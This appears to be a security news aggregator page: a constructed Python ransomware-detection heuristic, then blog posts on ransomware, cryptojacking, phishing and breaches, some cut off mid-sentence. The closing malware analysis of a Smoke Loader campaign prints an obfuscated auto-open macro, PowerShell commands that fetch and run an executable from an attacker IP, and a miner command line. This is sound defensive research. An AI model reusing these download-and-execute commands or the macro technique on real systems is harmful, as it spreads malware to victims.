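```python
"""Entropy-burst heuristic for spotting mass file encryption in progress.

Added example for this page; not code from the article or from Quocirca.
Assumes a hypothetical feed of file-write events (timestamp_seconds, path,
bytes_written). Ciphertext is close to the 8-bit entropy maximum, ordinary
documents are far below it; an alert fires only when most writes in a short
window are high-entropy, which separates a ransomware run from a user saving
one zip file. Sample events below are constructed.
"""
import math
import random
from collections import deque


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant input, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


class RansomwareWriteMonitor:
    def __init__(self, window_seconds=10.0, min_writes=5,
                 entropy_threshold=7.5, high_fraction=0.8):
        self.window = window_seconds
        self.min_writes = min_writes
        self.entropy_threshold = entropy_threshold
        self.high_fraction = high_fraction
        self.recent = deque()  # (timestamp, path, entropy), oldest first

    def observe(self, timestamp, path, data):
        """Record one write (events must arrive in time order); True if the window looks like mass encryption."""
        self.recent.append((timestamp, path, shannon_entropy(data)))
        while self.recent and timestamp - self.recent[0][0] > self.window:
            self.recent.popleft()
        return self.window_is_suspicious()

    def window_is_suspicious(self):
        n = len(self.recent)
        if n < self.min_writes:
            return False
        high = sum(1 for _, _, h in self.recent if h >= self.entropy_threshold)
        return high / n >= self.high_fraction


def replay(monitor, events):
    """Feed events through the monitor; return the index of the first alert, or -1."""
    for i, (ts, path, data) in enumerate(events):
        if monitor.observe(ts, path, data):
            return i
    return -1


def constructed_benign_writes():
    """A user saving text documents once a second: low entropy, never alerts."""
    body = b"Quarterly report: revenue grew 4%. " * 120
    return [(float(i), f"C:\\Users\\alice\\Documents\\report{i}.docx", body)
            for i in range(30)]


def constructed_ransomware_writes():
    """Ciphertext-like data written 20 times a second to renamed files."""
    rng = random.Random(1234)  # deterministic stand-in for encrypted output
    events = []
    for i in range(30):
        data = bytes(rng.getrandbits(8) for _ in range(4096))
        events.append((100.0 + i * 0.05,
                       f"C:\\Users\\alice\\Documents\\report{i}.docx.locked", data))
    return events


if __name__ == "__main__":
    print("benign run alerts at event:", replay(RansomwareWriteMonitor(), constructed_benign_writes()))
    print("ransomware run alerts at event:", replay(RansomwareWriteMonitor(), constructed_ransomware_writes()))
```

The fraction-over-a-window test is the important part: a single high-entropy write is normal (compressed archives, images and already-encrypted files all look random), so the heuristic only reacts to a sustained run of them. A product would combine this with the other signals the attack leaves, such as a new extension appended to every file and reads of canary files, and would respond by throttling or blocking the writing process rather than merely logging, as the quote above suggests.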

Under the traditional approach, data centres are often sited close to each other to keep latency low, but sitting within the same circle of disruption increases the financial, operational and reputational risks associated with downtime.

A few tips help to mitigate ransomware attacks:

• The more layers you can add the better.
• User education.
• Update your backup regularly; it can be the last layer of defence.
• Have a copy off site, on tape or in the cloud, but don’t leave the drawbridge down.
• Plan your backup process around your recovery requirement.

Following these will not stop every attack, but it makes recovery from one far quicker and cheaper.




E Hacking News - Latest Hacker News and IT Security News

Kaspersky Lab official blog: Cryakl/Fantomas victims rescued by new decryptor

The No More Ransom project for assisting victims of ransomware has good news to report: The Belgian police, in cooperation with Kaspersky Lab, managed to obtain keys for recovering files encrypted with new versions of Cryakl ransomware, also known as Fantomas. The updated decryption tool is already available on the project’s website.


What is Cryakl?

The Trojan ransomware Cryakl (Trojan-Ransom.Win32.Cryakl) has been . At first, it was distributed through attached archives in e-mails that appeared to come from an arbitration court in connection with some alleged wrongdoing. There is something about such messages that sets nerves to jangling, and even those who know better might be inclined to click on the attachment. Later, the e-mails diversified, looking like messages from other organizations, such as a local homeowners’ association.

When encrypting files on a victim’s computer, Cryakl creates a long key that it sends to a command-and-control (C&C) server. Without this key it is nearly impossible to recover the affected files. Cryakl then replaces the desktop wallpaper with the creators’ contact details and a ransom demand, and displays an image of the mask of the 1964 French movie villain Fantomas, hence its alternative name. Cryakl mostly targeted users in Russia, so information about it is mostly available in Russian.


Success story

As we already said, the joint efforts of our experts and Belgian police resulted in obtaining the master keys. The investigation began when the computer crime unit learned about victims of the ransomware in Belgium, and then they discovered a C&C server in a neighboring country. An operation led by the Belgian federal prosecutor neutralized the server, along with several other C&C servers that received master keys from infected machines. Then Kaspersky Lab stepped in to assist the law enforcement agencies, not for the first time. As before, the results were first-class: Our experts helped analyze the data found and extract the decryption keys.

The keys have already been added to the RakhniDecryptor tool on the No More Ransom website, and the Belgian federal police is now an official partner of the project. No More Ransom, which has been running since July 2016, has to date provided free help to tens of thousands of people in decrypting files rendered unusable by ransomware, and deprived cyberblackmailers of at least 10 million euros of potential booty.


How to rescue files encrypted by Cryakl ransomware

The No More Ransom site offers two tools for decrypting files corrupted by Cryakl. One, named RannohDecryptor and around since 2016, is for older versions of Cryakl. You can download it at NoMoreRansom.org, and get decryption instructions here.

We recently updated the second tool, RakhniDecryptor, by adding the master keys from the servers seized by the Belgian police. It can be downloaded from the same site; instructions are available here. RakhniDecryptor is needed to decrypt files hit by newer versions of Cryakl. Either one of the tools should restore Cryakl-infected files to full health.

How to stay safe in the future

When dealing with cryptoransomware, prevention is far cheaper and simpler than a cure. In other words, it’s better to secure yourself now and sleep easy than to mess around with file decryption. We’d like to share a few preemptive file protection tips:

1. Always keep a copy of your most important files somewhere else: in the cloud, on another drive, on a memory stick, or on another computer. More details about backup options are available here.

2. Use reliable AV software. Some security solutions — for example, Kaspersky Total Security — can also assist with file backup.

3. Don’t download programs from suspicious sources. Their installers might contain something you’d rather not have on your computer.

4. Don’t open attachments in e-mails from unknown senders, even if they look important and credible. If in doubt, look up the phone number on the organization’s official website and call to check.



Kaspersky Lab official blog

Cryakl Ransomware Decryption Keys Released by Belgian Federal Police

The Belgian federal police has released free decryption keys for Cryakl ransomware following an international law enforcement operation. On 9 February, the European Union Agency for Law Enforcement Cooperation (Europol) announced the release of the keys through No More Ransom. The move represents the culmination of an investigation that involved Belgian police, the Dutch National […]… Read More

The post Cryakl Ransomware Decryption Keys Released by Belgian Federal Police appeared first on The State of Security.

How to Avoid Ransomware in 5 Easy Steps

As you scroll through your social media feed, a window pops up: “Your hard drive has been encrypted. You have 48 hours to pay $200 or your data will be destroyed.” You see a link and instructions to “pay in Bitcoin.” An ominous looking timer counts down the seconds and minutes for the two-day window. Nine, eight, seven….  

Your thoughts immediately go to the contents of your hard drive — your daughter’s graduation video, your bank statements, a life insurance policy, pictures of your grandchildren — they all sit there, vulnerable, helpless bits of ones and zeros…and you don’t know what the heck bitcoin is.

Welcome to the world of ransomware — digital data hostage-taking only Hollywood could make up. Ransomware is a security threat for people and business, and cybersecurity experts predict it will only get worse in the future. One cause for its popularity is the profitability of the enterprise. Cyberthieves rake in millions every year with threats to destroy or encrypt valuable data if their ransoms aren’t paid.

You don’t need to be a millionaire or multinational corporation to be at risk. Cyberthieves also target the data of average consumers. When they target consumers, hackers may only request a few hundred dollars ransom but when the threat includes a thousand people, it makes for quite the lucrative venture. Many ransomware victims feel the risk of losing their data is too great, so they pay up. However, this only encourages the criminals.

The best way to combat ransomware is by not becoming a victim in the first place. To that end, here are five immediate steps you can take to avoid ransomware attacks.   

Step 1: Set Your Operating System to Automatically Update

The first step to avoiding ransomware is to keep your operating system (OS) up to date. Anything connected to the web works better when its OS is updated. Tech companies like Microsoft and Apple regularly research and release fixes for bugs and security patches for vulnerabilities in their systems. It’s a cybersecurity game of cat and mouse: cyberthieves search for holes, and companies race to find them first and patch them.

Users are key players in the game because they are the ultimate gatekeepers of their operating systems. If your OS isn’t up to date, you can’t take advantage of the security updates. Plus, your computer runs better with an updated OS.

Set your OS to update automatically and you won’t need to remember to do it manually. Windows 10 updates automatically (you have no choice), but older versions don’t. Setting up automatic updates is easy, whether you’re on a Mac or a PC.

Step 2: Screenshot Your Bank Emails

Cybercriminals use trojans or worms to infect your computer with ransomware. So avoiding these will help you avoid ransomware. Worms and trojan malware are often spread through phishing email scams, which trick users into opening email attachments containing viruses or clicking links to fake websites posed as legitimate ones.

One of the best tips for keeping phishing emails at bay is learning to identify them. Hackers send phishing emails that look like they come from banks, credit card companies, or the IRS. Phishing emails kickstart your fears and anxieties by suggesting there are “problems with your account” or insisting that “Urgent action is required.” Who wouldn’t be scared if their bank sent them an email saying, “You are overdrawn in your account.”

Cybercriminals use this fear to distract people so they will overlook the telltale signs of the phishing email like misspellings or common fear-inducing subject lines.     

Take screenshots of legitimate emails from your bank, credit card companies, and other businesses that manage your sensitive information. Compare future emails against these screenshots so you can spot phishing phonies and avoid ransomware.

Step 3: Bookmark Your Most Visited Websites

The next step in your ransomware avoidance journey is to bookmark all of your most visited websites. Just as with phishing emails, cybercriminals build websites that look like bank or credit card sites. Then they trick users into clicking a link and visiting them. From there, hackers steal your sign-in credentials or infect your computer with malware.

Think twice before you visit a website by clicking a link in an email, comments section, or private messaging app. Instead, bookmark your most visited or high-value websites and visit them through your browser.  

Step 4: Backup Your Data to the Cloud and a Hard Drive

This step is a no-brainer. Ransomware works only if you have a single copy of your data: if that copy is irretrievable, the cyberthieves have the upper hand, but if you have multiple copies, you have taken away the power behind the threat.

Back up your data to both a cloud service and a hard drive. That way, you have a copy that’s available anywhere there’s internet access and one that’s physically accessible all the time. Both types of storage are relatively inexpensive and will certainly prove worth it if you’re ever a ransomware target.

After backing up your data, set up a schedule so you can keep your data current. If you haven’t backed up your data in six months, you’re probably just as vulnerable to ransomware attacks as having no backup at all.

The post How to Avoid Ransomware in 5 Easy Steps appeared first on Panda Security Mediacenter.

Webroot Threat Blog: Cyber News Rundown: Scarab Ransomware Strikes Back

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst and a guy with a passion for all things security. Any questions? Just ask.

New Variant of Scarab Ransomware

With a few interesting changes to the original Scarab ransomware, Scarabey is quickly targeting Russian-speaking users with brute force attacks on unsecured RDP connections, rather than with the spam email campaigns used by its predecessor. Additionally, Scarabey takes the ransom a bit further by deleting 24 files from the encrypted machine for every 24 hours that the ransom remains unpaid.

Botnets Used to Spread Cryptocurrency Miners

Following the Shadow Brokers release of NSA exploits last summer, the use of EternalBlue continues with the latest trend of using the exploit to compromise machines and turn them into cryptocurrency miners. By expanding the botnet to cover over 500,000 unique machines, the attackers have successfully brought in more than $3 million since May of 2017. The use of such a large-scale botnet can effectively mine for the more resource-intensive currencies with ease and even disrupt businesses from their normal workflow for days at a time.

Bitcoin Ads Circumvent Facebook Ban

In the past week, Facebook officially implemented a ban on all cryptocurrency-related advertisements on their site. However, the ads have continued to appear for many users with characters in the phrase ‘bitcoin’ simply misspelled. The ban was initially set to block misleading financial services and products that unknowing users might click on due to the apparent legitimacy of the ads.

 


Mac Software Sites Distributing Crypto Miners

As crypto miners continue to gain popularity among cyber criminals, it was inevitable that they would begin focusing on Macs. MacUpdate, a well-known software download site, was recently found to be bundling miners with commonly used applications. Luckily, some of these bundles are poorly written and often fail to launch the decoy app, which is intended to draw users’ attention away from the malicious activity. To make matters worse, several other download sites were also affected and waited far too long to remove the malicious download links from their servers.

Tech Scammers Exploit Chrome Flaw

Tech scammers have long been the bane of legitimate software companies and their support teams. The latest trick, however, can easily bring an unsuspecting user to a full panic attack by simply rendering a Chrome browser completely unusable. First it displays an error message and then silently forces the browser to save a random file to disk at such a pace that the machine’s CPU maxes out and leaves the computer in a ‘locked’ state in the hopes that the victim will actually contact the phony support number being displayed.

The post Cyber News Rundown: Scarab Ransomware Strikes Back appeared first on Webroot Threat Blog.



Webroot Threat Blog

Microsoft & Google unable to detect new zero-day ransomware

The ShurL0ckr ransomware was able to avoid detection by a majority of anti-virus engines and cloud applications.As organisations have adopted cloud services to increase their productivity and agility, so to

The post Microsoft & Google unable to detect new zero-day ransomware appeared first on The Cyber Security Place.

Malicious Trends: Cryptojacking Could Surpass Ransomware as Primary Money Maker

Cryptocurrencies are hot. According to https://coinmarketcap.com, there are now over 1300 cryptocurrencies with new initial coin offerings (ICOs) accelerating all the time. Even Kodak is getting into the act with KODAKcoin. And currently, the price trajectory of Bitcoin is higher than a North Korean rocket, with Blockchain saving the world one application at a time. […]… Read More

The post Malicious Trends: Cryptojacking Could Surpass Ransomware as Primary Money Maker appeared first on The State of Security.


What can businesses learn from the cyber threat landscape of 2017?

Over the course of 2017, global cyber threats continued to evolve at pace, resulting in a dramatic reshaping of the cyber security landscape. Traditional threats such as generic Trojans, ransomware

The post What can businesses learn from the cyber threat landscape of 2017? appeared first on The Cyber Security Place.

2017: Worst Year Ever for Data Loss and Breaches

Last year set the record for both the most breaches and the most data compromised in a year, as several new trends (like a surge in cloud storage misconfigurations) characterized

The post 2017: Worst Year Ever for Data Loss and Breaches appeared first on The Cyber Security Place.

A week in security (January 29 – February 04)

Last week on Labs, we looked into PUPs stealing and using mainstream logos of security and tech companies to further gain user trust, GandCrab and Scarab ransomware variants in the wild, and a new Mac malware called OSX.CreativeUpdater that can be distributed via MacUpdate. We also profiled robocalling and ransomware, particularly how ransomware was named the “It” malware of early- to mid-2017, and then began to fizzle like a dying firecracker at end of the year onwards.

Other news

Stay safe, everyone!

The post A week in security (January 29 – February 04) appeared first on Malwarebytes Labs.

Ransomware’s difficult second album

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically —to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Ransomware drop


Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.

FAQ


Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

Get in the bin

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks in 2017, security tools have become better equipped to deal with ransomware threats. In addition, independent researchers have released many standalone programs to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools), together with falling prices for file storage, has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.

[Image: mining]

The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website than to build the ransomware, pay some developers, mess around with onion sites, write up long FAQs for the victims, maintain C&C servers, ensure the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low-traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on YouTube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast-moving plague, and it throws the old argument over whether blocking ads hurts publishers into the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

[Image: fake fonts]

Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in a bit of a self-imposed time out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

Watch out, cyber criminals are using fake FBI emails to infect your computer

The FBI Internet Crime Complaint Center (IC3) is warning of a new malware campaign aimed at infecting victims with weaponized attachments.

The Feds’ Internet Crime Complaint Center (IC3) is warning of a new spam campaign aimed at infecting victims with ransomware. According to an alert issued on Wednesday by the IC3, numerous citizens filed complaints after receiving emails purporting to be from the IC3. The message claims to offer compensation for a cyber attack and asks the victim to fill in the attached document, but the file is laced with malware.

The story is interesting: the email claims that a Nigerian cyber criminal has been arrested and that the feds found the recipient’s email address on the alleged scammer’s PC. The email asks victims to return the document with their details and wait for the refund to arrive. Once the victim opens the document, the infection process starts.

[Image: FBI]

The FBI has identified at least three other versions of the IC3 impersonation scam:

  • “The first involved a fake IC3 social media page, which advertised itself as the FBI Cyber Crime Department (IC3) and requested recipients provide personal information in order to report an internet crime.” states the alert issued by the FBI.
  • “The second involved an email which stated the recipient was treated unfairly by various banks and courier companies. The email claimed the recipient’s name was found in a financial company’s database and that they will be compensated for this unfair treatment.”
  • “The third example involved an email from the Internet Crime Investigation Center/Cyber Division and provided an address in Minneapolis, Minnesota. The email also included a case reference number in the subject line. The email informed the recipient that their IP address was referred to the IC3 as a possible victim of a federal cyber-crime. The email then requests the recipient to contact the sender via telephone.”

The FBI is currently investigating the cases; victims of an online scam can file a complaint with the IC3 at www.ic3.gov.

Pierluigi Paganini

(Security Affairs – FBI, malware)

The post Watch out, cyber criminals are using fake FBI emails to infect your computer appeared first on Security Affairs.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google security researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre', these vulnerabilities disclose confidential data when exploited by a hacker or malware. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors; kudos to them.

The UK Information Commissioner's Office (ICO) heavily criticised Carphone Warehouse for security inadequacies and fined the company £400K following its 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack". Where have we heard that excuse before? Certainly the ICO wasn't buying it after it investigated, reporting a large number of Carphone Warehouse security failures, which included the use of software that was six years out of date; a lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data; the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. Carphone Warehouse should thank its lucky stars the breach didn't occur after the General Data Protection Regulation comes into force: with such a damning list of security failures, the company may well have been fined considerably more by the ICO, which is granted vastly greater financial sanctions and powers when the GDPR kicks in in May.

The National Cyber Security Centre warned that the UK national infrastructure faces serious nation-state attacks, stating it is a matter of "when", not "if". There were also claims that the cyberattacks against Ukraine in recent years were down to Russia testing and tuning its nation-state cyberattack capabilities.

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPetya ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet; the hacker then moved the currency into a different wallet platform.

In the United States, the Federal Trade Commission (FTC) fined toy firm VTech US$650,000 (£482,000) for violating US children's privacy law. The FTC alleged the toy company violated the Children's Online Privacy Protection Rule (COPPA) by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption were responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high-value target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January. The Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents doubled in 2017 and that 93% were preventable. Carbon Black's 2017 Threat Report stated that non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and that the number of attacks skyrocketed during the course of the year; no surprise there.

The Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also let them identify ideal attack points from which to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and that companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.


Smashing Security #063: Carole’s back!


Fitness trackers breaching your privacy, how anyone can create convincing celebrity porn, and how ransomware authors are getting ripped off by scammers.

All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest Maria Varmazis.

Ransomware And Cryptomining Spiked In 2017 According To Report

Spoiler alert: There are a lot of exploits and malware spreading online in an attempt to ruin your day. Year after year security vendors compile data to produce annual reports

The post Ransomware And Cryptomining Spiked In 2017 According To Report appeared first on The Cyber Security Place.

Smoke Loader Campaign: When Defense Becomes a Numbers Game

Authored by Alexander Sevtsov
Edited by Stefano Ortolani

Introduction

Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.

The Malicious Document

The malicious document file consists of the following macro code:

Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    ' Chr(84)+Chr(105)+Chr(116)+Chr(108)+Chr(101) spells "Title": read that document property as a byte array
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) + Chr(108) + Chr(101)), vbFromUnicode)
    ' Shift every byte down by 6
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    ' Reverse the result; element 0 of the "|"-split string is a token that stands for ".", element 1 is the command line
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    ' Chr(46) is "."; FPATH is replaced by the full path of the open document, then the command runs hidden (window style 0)
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), "FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

The macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.

The PowerShell Downloader

Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:

powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');

This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.

Payload – Smoke Loader

The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):

Figure 1. Analysis overview of the Smoke Loader

As often happens, signatures are not really informative, as we can see in Figure 2.

Figure 2. VT detection of the Smoke Loader

The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:

  • GlobeImposter Ransomware, eventually displaying the ransom note in Figure 3.

    Figure 3. Ransom note of the GlobeImposter Ransomware delivered by the Smoke Loader.


  • Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
  • Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals some well-known pool id we have been seeing already:

wuauclt.exe -o stratum+tcp://ca.minexmr.com:443 -u 49X9ZwRuS6JR74LzwjVx2tQRQpTnoQUzdjh76G3BmuJDS7UKppqjiPx2tbvgt27Ru6YkULZ4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe

Figure 4. XMRig Monero CPU miner

Intelligence

It’s worth mentioning that it’s not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that perfectly executed in a default Windows 7 installation:

powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env:temp + '\~tmp.exe';
foreach($myurl in $myurls) {
    try {
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;
        break;
    } catch {}
}

This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.

Mitigation

There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.

